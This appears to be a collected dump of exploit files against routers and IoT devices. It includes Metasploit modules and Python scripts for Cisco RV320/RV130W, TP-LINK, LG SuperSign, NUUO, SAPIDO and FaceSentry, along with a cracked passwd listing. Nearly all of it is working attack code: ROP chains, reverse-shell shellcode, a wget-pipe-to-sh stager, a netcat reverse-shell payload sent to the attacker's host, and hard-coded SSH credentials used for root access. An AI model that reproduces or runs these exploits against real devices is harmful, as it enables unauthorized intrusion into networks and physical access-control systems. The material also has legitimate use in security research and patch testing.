Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5546
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
06.09.2019
--
# cat /etc/passwd
root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:administrator:/:/bin/sh
nobody:*:254:254:nobody:/var/empty:/bin/sh
logout:gfr8cijmRSDck:498:506:logout:/:
# john --show /etc/passwd
root:pass:0:0:administrator:/:/bin/sh
logout:logout:498:506:logout:/:
2 password hashes cracked, 0 left

207
exploits/hardware/remote/46655.rb Executable file
View file

@ -0,0 +1,207 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "Cisco RV320 and RV325 Unauthenticated Remote Code Execution",
'Description' => %q{
This exploit module combines an information disclosure (CVE-2019-1653)
and a command injection vulnerability (CVE-2019-1652) together to gain
unauthenticated remote code execution on Cisco RV320 and RV325 small business
routers. Can be exploited via the WAN interface of the router. Either via HTTPS
on port 443 or HTTP on port 8007 on some older firmware versions.
},
'License' => MSF_LICENSE,
'Author' => [
'RedTeam Pentesting GmbH', # Discovery, Metasploit
'Philip Huppert', # Discovery
'Benjamin Grap' # Metasploit
],
'References' => [
[ 'CVE','2019-1653' ],
[ 'CVE','2019-1652' ],
[ 'EDB','46243' ],
[ 'BID','106728' ],
[ 'BID','106732' ],
[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],
[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]
],
'Platform' => 'linux',
'Targets' =>
[
[ 'LINUX MIPS64',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS64
}
]
],
'Payload' =>
{
'BadChars' => ""
},
'CmdStagerFlavor' => [ 'bourne' ],
'Privileged' => true,
'DisclosureDate' => "Sep 9 2018",
'DefaultTarget' => 0))
register_options([
Opt::RPORT(8007), # port of Cisco webinterface
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
])
deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
deregister_options('SSLCert') # not required since stager only uses HTTP.
end
def execute_command(cmd, opts = {})
# use generated payload, we don't have to do anything here
end
def autofilter
true
end
def on_request_uri(cli, req)
print_status("#{peer} - Payload request received: #{req.uri}")
@cmdstager = generate_cmdstager().join(';')
send_response(cli, "#{@cmdstager}")
end
def primer
payload_url = get_uri
print_status("Downloading configuration from #{peer}")
if(datastore['USE_SSL'])
print_status("Using SSL connection to router.")
end
res = send_request_cgi({
'uri' => normalize_uri("cgi-bin","config.exp"),
'SSL' => datastore['USE_SSL']
})
unless res
vprint_error('Connection failed.')
return nil
end
unless res.code == 200
vprint_error('Could not download config. Aborting.')
return nil
end
print_status("Successfully downloaded config")
username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]
pass = res.body.match(/^PASSWD=(\h+)/)[1]
authkey = "1964300002"
print_status("Got MD5-Hash: #{pass}")
print_status("Loging in as user #{username} using password hash.")
print_status("Using default auth_key #{authkey}")
res2 = send_request_cgi({
'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST',
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
})
unless res
vprint_error('Connection failed during login. Aborting.')
return nil
end
unless res.code == 200
vprint_error('Login failed with downloaded credentials. Aborting.')
return nil
end
#Extract authentication cookies
cookies = res2.get_cookies()
print_status("Successfully logged in as user #{username}.")
print_status("Got cookies: #{cookies}")
print_status("Sending payload. Staging via #{payload_url}.")
#Build staging command
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
if(command_string.length <= 63)
print_status("Staging command length looks good. Sending exploit!")
else
vprint_error("Warning: Staging command length probably too long. Trying anyway...")
end
res3 = send_request_cgi({
'uri' => normalize_uri("certificate_handle2.htm"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST',
'cookie' => cookies,
'vars_get' => {
'type' => '4',
},
'vars_post' => {
'page' => 'self_generator.htm',
'totalRules' => '1',
'OpenVPNRules' => '30',
'submitStatus' => '1',
'log_ch' => '1',
'type' => '4',
'Country' => 'A',
'state' => 'A',
'locality' => 'A',
'organization' => 'A',
'organization_unit' => 'A',
'email' => 'any@example.com',
'KeySize' => '512',
'KeyLength' => '1024',
'valid_days' => '30',
'SelectSubject_c' => '1',
'SelectSubject_s' => '1'
},
'data' => "common_name=#{command_string}"
})
unless res3
vprint_error('Connection failed while sending command. Aborting.')
return nil
end
unless res3.code == 200
vprint_error('Sending command not successful.')
return nil
end
print_status("Sending payload timed out. Waiting for stager to connect...")
end
def check
#Check if device is vulnerable by downloading the config
res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
unless res
vprint_error('Connection failed.')
return CheckCode::Unknown
end
unless res.code == 200
return CheckCode::Safe
end
unless res.body =~ /PASSWD/
return CheckCode::Detected
end
CheckCode::Vulnerable
end
def exploit
# Main function.
# Setting delay for the Stager.
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
print_status("Waiting for stager connection timed out. Try increasing the delay.")
end
end

139
exploits/hardware/remote/46678.py Executable file
View file

@ -0,0 +1,139 @@
#Author Grzegorz Wypych - h0rac
# TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit
import requests
import md5
import base64
import string
import struct
import socket
password = md5.new('admin').hexdigest()
cookie = base64.b64encode('admin:'+password)
print '[+] Authorization cookie: ', cookie
print '[+] Login to generate user directory...'
#proxy = {'http':'127.0.0.1:8080'}
loginUrl = 'http://192.168.0.1/userRpm/LoginRpm.htm?Save=Save'
headers = {'cookie':'Authorization=Basic%20'+cookie.replace('=', '%3D')}
req = requests.get(loginUrl, headers=headers)
directory = ''
nop = "\x27\xE0\xFF\xFF"
shellcode = string.join([
"\x24\x0f\xff\xfa", # li t7,-6
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x21\xe4\xff\xfd", # addi a0,t7,-3
"\x21\xe5\xff\xfd", # addi a1,t7,-3
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x24\x02\x10\x57", # li v0,4183
"\x01\x01\x01\x0c", # syscall 0x40404
"\xaf\xa2\xff\xff", # sw v0,-1(sp)
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x34\x0f\xff\xfd", # li t7,0xfffd
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\xaf\xaf\xff\xe0", # sw t7,-32(sp)
"\x3c\x0e\x1f\x90", # lui t6,0x1f90
"\x35\xce\x1f\x90", # ori t6,t6,0x1f90
"\xaf\xae\xff\xe4", # sw t6,-28(sp)
# Big endian IP address 172.28.128.4
"\x3c\x0e\xc0\xA8" # lui t6,0x7f01
#"\xac\x1c\x80\x04", # lui t6,0x7f01
"\x35\xce\x01\x64", # ori t6,t6,0x101
"\xaf\xae\xff\xe6", # sw t6,-26(sp)
"\x27\xa5\xff\xe2", # addiu a1,sp,-30
"\x24\x0c\xff\xef", # li t4,-17
"\x01\x80\x30\x27", # nor a2,t4,zero
"\x24\x02\x10\x4a", # li v0,4170
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x0f\xff\xfd", # li t7,-3
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x01\xe0\x28\x21", # move a1,t7
"\x24\x02\x0f\xdf", # li v0,4063
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x10\xff\xff", # li s0,-1
"\x21\xef\xff\xff", # addi t7,t7,-1
"\x15\xf0\xff\xfa", # bne t7,s0,68 <dup2_loop>
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x3c\x0f\x2f\x2f", # lui t7,0x2f2f
"\x35\xef\x62\x69", # ori t7,t7,0x6269
"\xaf\xaf\xff\xec", # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f", # lui t6,0x6e2f
"\x35\xce\x73\x68", # ori t6,t6,0x7368
"\xaf\xae\xff\xf0", # sw t6,-16(sp)
"\xaf\xa0\xff\xf4", # sw zero,-12(sp)
"\x27\xa4\xff\xec", # addiu a0,sp,-20
"\xaf\xa4\xff\xf8", # sw a0,-8(sp)
"\xaf\xa0\xff\xfc", # sw zero,-4(sp)
"\x27\xa5\xff\xf8", # addiu a1,sp,-8
"\x24\x02\x0f\xab", # li v0,4011
"\x01\x01\x01\x0c" # syscall 0x40404
], '')
libcBase= 0x77f53000
sleep = libcBase + 0x53CA0
gadget1 = libcBase + 0x00055c60 # addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;
gadget2 = libcBase + 0x00024ecc #lw $ra, 0x2c($sp); lw $s1, 0x28($sp); lw $s0, 0x24($sp); jr $ra;
gadget3 = libcBase + 0x0001e20c # move $t9, $s1; lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $t9
gadget4 = libcBase + 0x000195f4 #addiu $s0, $sp, 0x24; move $a0, $s0; move $t9, $s1; jalr $t9;
gadget5 = libcBase + 0x000154d8 # #move $t9, $s0; jalr $t9;
print "[+] First gadget address: ", hex(gadget1)
print "[+] Second gadget address: ", hex(gadget2)
print "[+] Third gadget address: ", hex(gadget3)
print "[+] Fourth gadget address: ", hex(gadget4)
print "[+] Fifth gadget address: ", hex(gadget4)
print "[+] Sleep function address: ", hex(sleep)
payload = "A"*160
s0 = "BBBB"
s1 = gadget2
payload += s0
payload += struct.pack('>I', s1)
payload += struct.pack('>I', gadget1) #Overwrite RA address
#New stack for gadget 2 starts
payload += "E" * 20 # adjust stack
payload += "FFFF" #gadget3 -> lw $s0, 0x18($sp) => 24 bytes
payload += "GGGG" #gadget3 -> lw $s1, 0x1c($sp) => 28 bytes
payload += "HHHH" #gadget3 -> lw $s2, 0x20($sp) => 32 bytes
payload += "AAAA"
payload += "CCCC"
payload += struct.pack('>I', sleep) #gadget2 -> lw $s1, 0x28($sp) => 40 bytes
payload += struct.pack('>I', gadget3) #gadget2 -> lw $ra, 0x2c($sp) => 44 bytes
#New stack for gadget 3 starts
payload += "G" *24
payload += "A"* 4 #lw $s0, 0x18($sp); sp + 24 bytes = s0
payload += struct.pack('>I', gadget5)#lw $s1, 0x1c($sp); sp + 28 bytes = s1 <= load gadget 5 addr
payload += "C" *4 #lw $s2, 0x20($sp); sp + 32 bytes = s2
payload += struct.pack('>I', gadget4) #lw $ra, 0x24($sp); sp + 36 bytes = ra <= load gadget 4 addr
#New stack for gadget 4 starts
payload += nop * 32
payload += shellcode #addiu $s0, $sp, 0x24; sp + 36 bytes = s0
if(req.status_code):
directory = req.text.split('=')[2].split('/')[3]
print '[+] Retrieved folder name: ', directory
req.close()
referer ='http://192.168.0.1/{0}/userRpm/DiagnosticRpm.htm'.format(directory)
host = '192.168.0.1'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, sending payload {0} bytes...".format(len(payload))
pingUrl = '{1}/userRpm/PingIframeRpm.htm'.format(host,directory)
pingUrl += '?ping_addr='+payload+'&doType=ping&isNew=new&sendNum=4&psize=64&overTime=800&trHops=20'
auth = 'Authorization=Basic%20'+cookie.replace('=', '%3D')
pingReq = "GET /{0} HTTP/1.1\r\nHost: {1}\r\nReferer: {2}\r\ncookie: {3}\r\n\r\n".format(pingUrl, host, referer, auth)
print "[+] Exploit request: {0}".format(pingReq)
s.send(pingReq)
s.recv(4096)
s.close()
else:
req.close()

149
exploits/hardware/remote/46705.rb Executable file
View file

@ -0,0 +1,149 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco RV130W Routers Management Interface Remote Command Execution',
'Description' => %q{
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.
RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
Note: successful exploitation may not result in a session, and as such,
on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
},
'Author' =>
[
'Yu Zhang', # Initial discovery
'Haoliang Lu', # Initial discovery
'T. Shiomitsu', # Initial discovery
'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'Platform' => %w[linux],
'Arch' => [ARCH_ARMLE],
'SessionTypes' => %w[meterpreter],
'CmdStagerFlavor' => %w{ wget },
'Privileged' => true, # BusyBox
'References' =>
[
['CVE', '2019-1663'],
['BID', '107185'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
],
'DefaultOptions' => {
'WfsDelay' => 10,
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
},
'Targets' =>
[
[ 'Cisco RV130/RV130W < 1.0.3.45',
{
'offset' => 446,
'libc_base_addr' => 0x357fb000,
'system_offset' => 0x0004d144,
'gadget1' => 0x00020e79, # pop {r2, r6, pc};
'gadget2' => 0x00041308, # mov r0, sp; blx r2;
'Arch' => ARCH_ARMLE,
}
],
],
'DisclosureDate' => 'Feb 27 2019',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN, ],
},
))
end
def p(offset)
[(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
end
def prepare_shellcode(cmd)
#All these gadgets are from /lib/libc.so.0
shellcode = rand_text_alpha(target['offset']) + # filler
p(target['gadget1']) +
p(target['system_offset']) + # r2
rand_text_alpha(4) + # r6
p(target['gadget2']) + # pc
cmd
shellcode
end
def send_request(buffer)
begin
send_request_cgi({
'uri' => '/login.cgi',
'method' => 'POST',
'vars_post' => {
"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
}
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end
def exploit
print_status('Sending request')
execute_cmdstager
end
def execute_command(cmd, opts = {})
shellcode = prepare_shellcode(cmd.to_s)
send_request(shellcode)
end
def on_new_session(session)
# Given there is no process continuation here, the httpd server will stop
# functioning properly and we need to take care of proper restart
# ourselves.
print_status("Reloading httpd service")
reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
else
session.shell_command(reload_httpd_service)
end
ensure
super
end
end

72
exploits/hardware/remote/46795.rb Executable file
View file

@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'LG Supersign EZ CMS RCE',
'Description' => %q{
LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone
to remote code execution due to an improper parameter handling
},
'Author' => ['Alejandro Fanjul'],
'References' =>
[
[ 'CVE', '2018-17173' ],
[ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 21 2018'
)
)
register_options(
[
OptString.new('RPORT',[true,'Target port','9080'])
], self.class)
end
def exploit
lhost=datastore['LHOST']
lport=datastore['LPORT']
#uri = target_uri.path
cmd = Rex::Text.uri_encode(payload.encoded)
connect
res = send_request_raw({
'method'=>'GET',
'uri'=>"/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150"
})
handler
disconnect
end
end

89
exploits/hardware/remote/46960.py Executable file
View file

@ -0,0 +1,89 @@
#!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
# [ leading / ]
# [ Padding x 335 ]
# [ original value at stack pointer + 158 ]
# [ padding x 80 ]
# [ address of (pop {r3,lr} ; bx lr) ]
# [ system() address ]
# [ address of (mov r0,sp ; blx r3) ]
# [ command to execute ]
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target Port - default 5150\n"
" -c, --command: Command to execute\n"
"\n"
"Example:\n"
"python script.py -a 10.10.10.10\n"
"python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
exit()
def main():
rhost = None;
rport = "5150";
command = "{/bin/touch,/tmp/hax}"
banner()
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
elif opt in ('-c','--command'):
command = arg;
print ("Sending exploit to execute [" + command + "]\n")
buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
"\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
"http://" + rhost + ":" + rport + "\r\n\r\n"
sock = socket(AF_INET, SOCK_STREAM)
sock.settimeout(30)
sock.connect((target_ip,int(target_port)))
sock.send(buf)
print ("done\n")
if __name__ == "__main__":
main()

68
exploits/hardware/remote/46961.py Executable file
View file

@ -0,0 +1,68 @@
#!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
#
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc};
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
#
# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'
#!/usr/bin/python
import requests
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
'''
def main():
banner()
command = "ping 192.168.1.100\x00"
print ("Sending exploit to execute [" + command + "]\n")
rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
payload = ("Z" * 446) + rop + command
url = "https://192.168.1.100:443/login.cgi"
data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
r = requests.post(url, payload=data)
if __name__ == "__main__":
main()

22
exploits/hardware/remote/47031.py Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: SAPIDO RB-1732 command line execution
# Date: 2019-6-24
# Exploit Author: k1nm3n.aotoi
# Vendor Homepage: http://www.sapido.com.tw/
# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
# Version: RB-1732 V2.0.43
# Tested on: linux
import requests
import sys
def test_httpcommand(ip, command):
my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
content = r.text
content = content[
content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
content.rfind('</textarea>')]
return content
print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))

108
exploits/hardware/remote/47067.py Executable file
View file

@ -0,0 +1,108 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit
#
#
# Vendor: iWT Ltd.
# Product web page: http://www.iwt.com.hk
# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
# Firmware 5.7.2 build 568 (Algorithm A14)
# Firmware 5.7.0 build 539 (Algorithm A14)
#
# Summary: FaceSentry 5AN is a revolutionary smart identity
# management appliance that offers entry via biometric face
# identification, contactless smart card, staff ID, or QR-code.
# The QR-code upgrade allows you to share an eKey with guests
# while you're away from your Office and monitor all activity
# via the web administration tool. Powered by standard PoE
# (Power over Ethernet), FaceSEntry 5AN can be installed in
# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
# grade access control or time-and-attendance appliance.
#
# Desc: FaceSentry facial biometric access control appliance
# ships with hard-coded and weak credentials for SSH access
# on port 23445 using the credentials wwwuser:123456. The root
# privilege escalation is done by abusing the insecure sudoers
# entry file.
#
# ================================================================
# lqwrm@metalgear:~$ python ssh_root.py 192.168.11.1
# [+] Connecting to 192.168.11.1 on port 23445: Done
# [*] wwwuser@192.168.11.1:
# Distro Ubuntu 16.04
# OS: linux
# Arch: Unknown
# Version: 4.10.0
# ASLR: Enabled
# Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# wwwuser@TWR01:~$ pwd
# /home/wwwuser
# wwwuser@TWR01:~$ sudo -l
# Matching Defaults entries for wwwuser on localhost:
# env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
#
# User wwwuser may run the following commands on localhost:
# (root) NOPASSWD: /sbin/service, PROCESSES, NETWORKING, REBOOT, IPTABLES, /faceGuard/bin/*, /faceGuard/database/Restore*, /bin/date, /bin/cat, /bin/echo, /faceGuard/bin/phpbin/*, /bin/sed, /sbin/*, /usr/sbin/*, /bin/*, /usr/bin/*
# wwwuser@TWR01:~$ sudo cat /etc/sudoers.d/sudoers.sentry
# Cmnd_Alias SENTRY = /faceGuard/bin/*
# Cmnd_Alias SENTRY_DB_RESTORE = /faceGuard/database/Restore*
# Cmnd_Alias DATE = /bin/date
# Cmnd_Alias CAT = /bin/cat
# Cmnd_Alias ECHO = /bin/echo
# Cmnd_Alias PRINTING = /usr/sbin/lpc, /usr/bin/lprm
# Cmnd_Alias SENTRYWEB = /faceGuard/bin/phpbin/*
# Cmnd_Alias SED = /bin/sed
# Cmnd_Alias SERVICES = /sbin/service
# Cmnd_Alias SBIN = /sbin/*, /usr/sbin/*
# Cmnd_Alias BIN = /bin/*, /usr/bin/*
#
# wwwuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
# iwtuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
# wwwuser@TWR01:~$ id
# uid=1001(wwwuser) gid=1001(wwwuser) groups=1001(wwwuser),27(sudo)
# wwwuser@TWR01:~$ sudo su
# root@TWR01:/home/wwwuser# id
# uid=0(root) gid=0(root) groups=0(root)
# root@TWR01:/home/wwwuser# exit
# exit
# wwwuser@TWR01:~$ exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.11.1
# lqwrm@metalgear:~$
# ================================================================
#
# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
# Linux 3.4.113-sun8i (armv7l)
# PHP/7.0.30-0ubuntu0.16.04.1
# PHP/7.0.22-0ubuntu0.16.04.1
# lighttpd/1.4.35
# Armbian 5.38
# Sunxi Linux (sun8i generation)
# Orange Pi PC +
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5526
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5526.php
#
#
# 28.05.2019
#
from pwn import *
if len(sys.argv) < 2:
print 'Usage: ./fs.py <ip>\n'
sys.exit()
ip = sys.argv[1]
rshell = ssh('wwwuser', ip, password='123456', port=23445)
rshell.interactive()

51
exploits/hardware/remote/47329.pl Executable file
View file

@ -0,0 +1,51 @@
#!/usr/bin/perl -w
#
#
# Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
